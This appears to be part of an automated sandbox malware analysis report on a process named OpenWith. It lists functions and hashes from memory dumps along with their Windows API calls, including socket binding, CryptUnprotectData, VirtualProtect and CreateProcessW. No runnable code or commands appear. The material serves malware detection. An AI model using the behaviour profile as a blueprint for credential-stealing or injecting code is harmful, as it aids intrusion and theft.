Instruction Fuzzy Hash: F621C331B08A884FE7509BD894C46AE7AE0FB98321F50167FE58FC3251D67898C48741

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD75700AC8 Relevance: 3.2, APIs: 2, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 000001BD75700BFD
NtAcceptConnectPort.NTDLL ref: 000001BD75700C47

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
Instruction ID: fa3778a173cd27c285c250f7b2a6aead8f13c8053eff13a49df087fba15f58ef
Opcode Fuzzy Hash: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
Instruction Fuzzy Hash: 18414F305189940AE32CF62D98866F977D2F7C531EFF0465EE4DAC2192EF39C9438642

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63B14B8 Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4B63B15D9), ref: 00007DF4B63B14E5

Part of subcall function 00007DF4B63B10C8: ioctlsocket.WS2_32 ref: 00007DF4B63B10F4

bind.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4B63B15D9), ref: 00007DF4B63B156A

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: bindioctlsocketsocket
String ID:
API String ID: 3555158474-0
Opcode ID: 440c2b03f282fdf09c5109c91abd02df385d83f8f207c58bd0edf43ea5c54b23
Instruction ID: 9193114c1209c4c318380e05ace46c332c0da98b877d753b31facef771198db3
Opcode Fuzzy Hash: 440c2b03f282fdf09c5109c91abd02df385d83f8f207c58bd0edf43ea5c54b23
Instruction Fuzzy Hash: 4D21B4307089444FEB58ABB8988C76637E9FB85335F1416BBD82FC72D6DA38AC018755

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638B088 Relevance: 3.1, APIs: 2, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B638B0F5
NtAcceptConnectPort.NTDLL ref: 00007DF4B638B14C

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 4a10f73cb9c6438758193fa1af4c389c91f2a938f8d24df1736836a91db41c6d
Instruction ID: a0f911aca0e6625dfa89b09a103cb35a6328a3f40668c2b6e4e1116ca93d395d
Opcode Fuzzy Hash: 4a10f73cb9c6438758193fa1af4c389c91f2a938f8d24df1736836a91db41c6d
Instruction Fuzzy Hash: E4215730118A498FDB44EF58D845BA677F1FBA9301F00456ED48BC71A0DBB8E584CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638B154 Relevance: 3.1, APIs: 2, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B638B1C1
NtAcceptConnectPort.NTDLL ref: 00007DF4B638B215

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: bb3a5d325b70b3c5869b9374de40748949ecffae94d84d132abe14aae408c96c
Instruction ID: 9da1419d377812ec024e99b49efb27f643e4e8927d8e3491cdc35dd4c1de893c
Opcode Fuzzy Hash: bb3a5d325b70b3c5869b9374de40748949ecffae94d84d132abe14aae408c96c
Instruction Fuzzy Hash: 54212430158A498FDB44EB58D894B6677F1FBA9301F00466EE58AC36B1DB78E944CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6397318 Relevance: 2.1, APIs: 1, Instructions: 552COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B63978E7

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: a6cd968419861a7b3701a0482a786f473b659c91568256b817c3ad8d95c3c928
Instruction ID: 6c86988b11949840ee3ccfb159bede49586d6c1795d3af8c879c178ec40b7ea7
Opcode Fuzzy Hash: a6cd968419861a7b3701a0482a786f473b659c91568256b817c3ad8d95c3c928
Instruction Fuzzy Hash: AB027E3161CA484BEB64EB58D485AABB7F1FFA4310F40556EE44FC3192DE34E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63B21BC Relevance: 1.8, APIs: 1, Instructions: 281networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007DF4B63B2322

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: c4c57ca064fec79989649ddb6862af836f57c300bd75a5ec3f98270fb5e76cde
Instruction ID: 9993c9c21613e93b6e623b274060c77ba91db6eba3bd11af3ca8210b75a3031f
Opcode Fuzzy Hash: c4c57ca064fec79989649ddb6862af836f57c300bd75a5ec3f98270fb5e76cde
Instruction Fuzzy Hash: 8EA1E430A18A854FE798CB5884C47B6BBF4FF55334F4822AAD45FC25D2DB38E8528781

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638A2B0 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B638A370

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 27f7c3ed38e874930e62f200bc0de066e796f05f1e534954138da2be9822abc3
Instruction ID: 35465dbedd81e2d5208d209e3024cc486461dd54a2a75464e3626d6c71cfd759
Opcode Fuzzy Hash: 27f7c3ed38e874930e62f200bc0de066e796f05f1e534954138da2be9822abc3
Instruction Fuzzy Hash: F181B930A1CB898BEB64DB9498446ABB7E1FF94350F50577BE44FC7281EAA8FC418741

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6389F40 Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B6389FBB

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 2b01fbad4d4e0569ef46bd7dcad2a47669287f66da831324c994fd011c0ec06d
Instruction ID: c86400511b6e4442431cba949f98abc4ae7a7aa34a9950501e578f0c46e1cb18
Opcode Fuzzy Hash: 2b01fbad4d4e0569ef46bd7dcad2a47669287f66da831324c994fd011c0ec06d
Instruction Fuzzy Hash: 2B31D531B0CA494FE71C5E9C98955BA37E4EB99321F10527EFA4FC32D2D929BC024781

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B637FF7C Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00007DF4B6380005

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a8ceccc7c3b42bea472bb160e78439ad2ed528e95685be1738a7c7424a046da7
Instruction ID: 92294d0fcc14a54da428af8fd16c57fe8a8e6f55468a2e0ec2da04baa743c8ca
Opcode Fuzzy Hash: a8ceccc7c3b42bea472bb160e78439ad2ed528e95685be1738a7c7424a046da7
Instruction Fuzzy Hash: E631723071CA484FE748EF68D88966ABBE1FB89351F40456EE58FC3292DF78D8418752

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6388E20 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNELBASE ref: 00007DF4B6388E72

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: 96d4bccc55a322f8c5c27047067bd6e78efec68c6d2ad20cad7b4eab26150e85
Instruction ID: b50531c81e5ae0e3c3e7561f9cb92c307242e0c37b497d269377cf1f5ee96542
Opcode Fuzzy Hash: 96d4bccc55a322f8c5c27047067bd6e78efec68c6d2ad20cad7b4eab26150e85
Instruction Fuzzy Hash: 5131B235528A848BEB61DB54E8846E777F2FFA4310F00156BE88FC3194EB79E940C792

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD757015AC Relevance: 1.6, APIs: 1, Instructions: 76
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,000001BD75701E16), ref: 000001BD75701640

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
Instruction ID: 4ec15e819951c30bb7438604895d45ecf3c623b00af883a4d2123c146e0249fa
Opcode Fuzzy Hash: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
Instruction Fuzzy Hash: 2021A871508B488FDB59DF58C8C96AAB7E1FB6830DF444A2EE44EC7250EB30D484CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6388C08 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B6388C57

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 69ae87b658735349c63cb263c91b486edbc403e9935b0c4573bbe27b5e633224
Instruction ID: 64d6e1a0f0e4914f1d1295014f294261c52288fe831a8c4840f2d5fdd451c34e
Opcode Fuzzy Hash: 69ae87b658735349c63cb263c91b486edbc403e9935b0c4573bbe27b5e633224
Instruction Fuzzy Hash: EBF0BD30A1CB848FDB64EF6CD485B5AB7E0FB98710F504559E44CC3246DB3498408B86

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6388A40 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B6388AA4

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 89cd4ab345dceba4e6838d8713e086a2de13f743721c8352f444b7a2b322383a
Instruction ID: 1420ec5f1d6c4a00e639122ecf5538ab775d89eff5e3bda0ed1a119ce9f00918
Opcode Fuzzy Hash: 89cd4ab345dceba4e6838d8713e086a2de13f743721c8352f444b7a2b322383a
Instruction Fuzzy Hash: A1F0623491C7C48FD7B0EB688480B9ABBF1BB9A354F54595DE4CCC3252D73494858B43

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6388D94 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF4B637220C), ref: 00007DF4B6388DBE

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 90d86ff9c1e45aa3ed72609050e60067f34580a971d45073cfca8314096fabd0
Instruction ID: 148ed65136746a1796b3fb47a16c32515827d0172d653e2da234ae905fee4e99
Opcode Fuzzy Hash: 90d86ff9c1e45aa3ed72609050e60067f34580a971d45073cfca8314096fabd0
Instruction Fuzzy Hash: 4EE09B316186448FDB00DF98CCC18AAB7F0EBD4314F400D7BE84FCA164D664D548C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63E7344 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,00007DF4B63F8C07,?,?,?,?,00000000,00000000), ref: 00007DF4B63E7361

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d5a7f866afa65459f197dada8cd8f2dc6bf23d315f68f71e19f7445dc10f9d53
Instruction ID: 997a99321e832031493a06d129e7c8e2d1eb15334534eafe09d891cc694cb38a
Opcode Fuzzy Hash: d5a7f866afa65459f197dada8cd8f2dc6bf23d315f68f71e19f7445dc10f9d53
Instruction Fuzzy Hash: 70E04F31A159685AF30DF770EC964E73621FBA4310F885A63D807C14A2FE3C67998B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6388C90 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B6388CAB

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: d7f11550b64fe24df7d887543e07d0b6f7dff11bcf48c6b7495f6615248458b8
Instruction ID: 7ca19f5434fda106d6170cf6217df84d20f2dd2d7329ec2a5b989f15d9378cdb
Opcode Fuzzy Hash: d7f11550b64fe24df7d887543e07d0b6f7dff11bcf48c6b7495f6615248458b8
Instruction Fuzzy Hash: 70D05E30D7CB894BDA50A76C88406467AF1FBD4314F904654D44DC3209E23CE44083C2

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6388AFC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4B6388B0C

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 2e7cca07a0f103a45b23901324486b8ac0a6e280eee8be16fb8f69fcdb4ab649
Instruction ID: 3d4b67aaf6fc7eaae6f0801339ee876c290c55b499c9da2744d5cf00c29bdea2
Opcode Fuzzy Hash: 2e7cca07a0f103a45b23901324486b8ac0a6e280eee8be16fb8f69fcdb4ab649
Instruction Fuzzy Hash: BEC08C44B2D84A1AE90162AA4C8024538E0FB88360F840461D40FC6180E91CE4C04392

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6374EE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF4B6374F48
VirtualProtect.KERNELBASE ref: 00007DF4B6374F71
VirtualProtect.KERNELBASE ref: 00007DF4B6374F8D
VirtualProtect.KERNELBASE ref: 00007DF4B6374FB8

Strings

rE\, xrefs: 00007DF4B6374F06

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID: rE\
API String ID: 544645111-988334199
Opcode ID: dad0ceb36d93f336d009a6519c6099e5a7208cb48d97b2cc31c542dde7e3d245
Instruction ID: 19aa3d885ad174acd9f8eb9c2199166c921b91220ec5026d033a5e4220c6d738
Opcode Fuzzy Hash: dad0ceb36d93f336d009a6519c6099e5a7208cb48d97b2cc31c542dde7e3d245
Instruction Fuzzy Hash: CB21A13171C9480BEB54E76C98D16AAB2E5FBD8710F101079E54FC3286DE28ED0587C2

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD758633B0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001BD75863527
RtlAllocateHeap.NTDLL ref: 000001BD7586367A
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001BD758636F9

Strings

l, xrefs: 000001BD758633D6

Memory Dump Source

Source File: 00000014.00000003.2319903154.000001BD75860000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1bd75860000_OpenWith.jbxd

Similarity

API ID: AllocateHeap$BoundaryDeleteDescriptor
String ID: l
API String ID: 2279964584-2517025534
Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction ID: e46f1facc05f92d7de043ed535009d5598515b546455ec5fa241d582c0160372
Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction Fuzzy Hash: 67A108315186984BD72D9A2CE8916F977D1FB9530CFD006AEE4D7C3183EF24D9468782

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6376694 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 195fileprocessCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007DF4B637673C
WriteFile.KERNELBASE ref: 00007DF4B637675E
CreateProcessW.KERNELBASE ref: 00007DF4B6376811

Strings

@, xrefs: 00007DF4B6376885

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: CreateFile$ProcessWrite
String ID: @
API String ID: 4257186015-2766056989
Opcode ID: bfc87d3717c946cb7aafd00cdb6a9423543d3d601a1de669ddfba25e8de830d3
Instruction ID: 8cae9c669985b24b1b2dc11820e618b32ffe0a00faed1eb853609ed792561c63
Opcode Fuzzy Hash: bfc87d3717c946cb7aafd00cdb6a9423543d3d601a1de669ddfba25e8de830d3
Instruction Fuzzy Hash: 5361723050CA888FE764EFA4D8987ABBBE0FB95311F10553EE04FD6292DF3894458B42

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6371F68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF4B6371FEA
VirtualProtect.KERNELBASE ref: 00007DF4B6372014

Strings

, xrefs: 00007DF4B6371FCB

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: e7e536793b46bbdf8757706278a080a854535d6fca16d5cb7745ca510e895c5d
Instruction ID: f527d1d707fc5135bcfc9654382a7e1e46f3669bfd8f247f013768646adf9fc2
Opcode Fuzzy Hash: e7e536793b46bbdf8757706278a080a854535d6fca16d5cb7745ca510e895c5d
Instruction Fuzzy Hash: DE11293260889A4BE715AB59D8A4AB677F1FB90320F5442AAE45FC31D1CB1CE852C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638131C Relevance: 4.6, APIs: 3, Instructions: 139COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4B63813AB
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B63813D7
_malloc_dbg.MSVCRT ref: 00007DF4B63813EA

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@
String ID:
API String ID: 2216462316-0
Opcode ID: de4e33abc2b85d707b14ce31c2985da81c8d9c2e164d1120f04ddc1fc4c9d720
Instruction ID: 3c152648023b98043ca500a5b4ba24f7df3abf410cc9a4f6c4605330e67bd625
Opcode Fuzzy Hash: de4e33abc2b85d707b14ce31c2985da81c8d9c2e164d1120f04ddc1fc4c9d720
Instruction Fuzzy Hash: C6416F31608E0E8FDB94EF6CD888AA577F1FB68311714466BD40EC3665DB74E8858BC0

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63639D4 Relevance: 4.6, APIs: 3, Instructions: 126COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4B63639FD
_malloc_dbg.MSVCRT ref: 00007DF4B6363A5C
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B6363AC0

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@
String ID:
API String ID: 2216462316-0
Opcode ID: c7d75cb5367958d73e9615a6bc6f349406efcf48a859619531f8c598722d50c9
Instruction ID: 013bd1945652e316b28208536134ace7b25650be633051e7bd7e9e663e5400e5
Opcode Fuzzy Hash: c7d75cb5367958d73e9615a6bc6f349406efcf48a859619531f8c598722d50c9
Instruction Fuzzy Hash: 5131923060CA495FFB58AF68D8499B6B7F5FF50321700526AD41BC2592EF64F851C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63B10C8 Relevance: 4.6, APIs: 3, Instructions: 117COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007DF4B63B10F4
CreateIoCompletionPort.KERNELBASE ref: 00007DF4B63B112A
SetFileCompletionNotificationModes.KERNEL32 ref: 00007DF4B63B1170

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: Completion$CreateFileModesNotificationPortioctlsocket
String ID:
API String ID: 1455841399-0
Opcode ID: ea0de95ab8d492ab321edf1cf0b460d03c03f83aa0a5be87d8e0918c001e10b9
Instruction ID: 78ccfb9cd2adfe7b3601bf7d7e6c900cc091fdbf3a4a6ee4fb2e76f49b5abba5
Opcode Fuzzy Hash: ea0de95ab8d492ab321edf1cf0b460d03c03f83aa0a5be87d8e0918c001e10b9
Instruction Fuzzy Hash: 9C31DB307085944BFBA49A9898C533A37FDEF65364F5821BAE80FC2183DA29DC418791

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6363564 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4B636373C
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B63637E3

Part of subcall function 00007DF4B6363410: _malloc_dbg.MSVCRT ref: 00007DF4B63634DF

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@
String ID:
API String ID: 2216462316-0
Opcode ID: ac8e64687a13b889e1874be42d2c3ca0f1a614677750a284a612a131824c467f
Instruction ID: c332697bf5fbe4da1ad4c28c78c26135a4894703c2458d6d3298d7d0f6816942
Opcode Fuzzy Hash: ac8e64687a13b889e1874be42d2c3ca0f1a614677750a284a612a131824c467f
Instruction Fuzzy Hash: 0D71E931A1C9884AE729A75898956FF7BE1FF95310F0055AFE08FC3183DD38A906C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B637B2B8 Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B6388AFC: NtAcceptConnectPort.NTDLL ref: 00007DF4B6388B0C

_malloc_dbg.MSVCRT ref: 00007DF4B637B366
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B637B3ED

Part of subcall function 00007DF4B6381570: _malloc_dbg.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4B63A00C6), ref: 00007DF4B638158F

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@AcceptConnectPort
String ID:
API String ID: 82011185-0
Opcode ID: 4ecf2b624d510c0b9105c9875737021730bb05f6acc8958d51b1f99a9df8c032
Instruction ID: 12ffa481b2184f4e439d58e930f762987dd1db9d4672923b4d6df53ea917cc5f
Opcode Fuzzy Hash: 4ecf2b624d510c0b9105c9875737021730bb05f6acc8958d51b1f99a9df8c032
Instruction Fuzzy Hash: 37415170508B488FEB58EF59D8856A6BBF0FB58311F00456EE84EC7292DB34E885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6374DFC Relevance: 3.1, APIs: 2, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007DF4B6374E42
VirtualProtect.KERNELBASE ref: 00007DF4B6374EBD

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: d1d5d62458b525b217cd191320538f3c548a21db8f8a8dd998a7d78b892a2355
Instruction ID: 25c661a8bbc2d02ba2454cc25fae34d6910b567844a462b028ed87109793668b
Opcode Fuzzy Hash: d1d5d62458b525b217cd191320538f3c548a21db8f8a8dd998a7d78b892a2355
Instruction Fuzzy Hash: E621A131218E484BDB58EF18D881FE6B7E1FB98310F00556AE54FC3282DE38F9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B645802C Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B64580AD
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B64580C1

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false
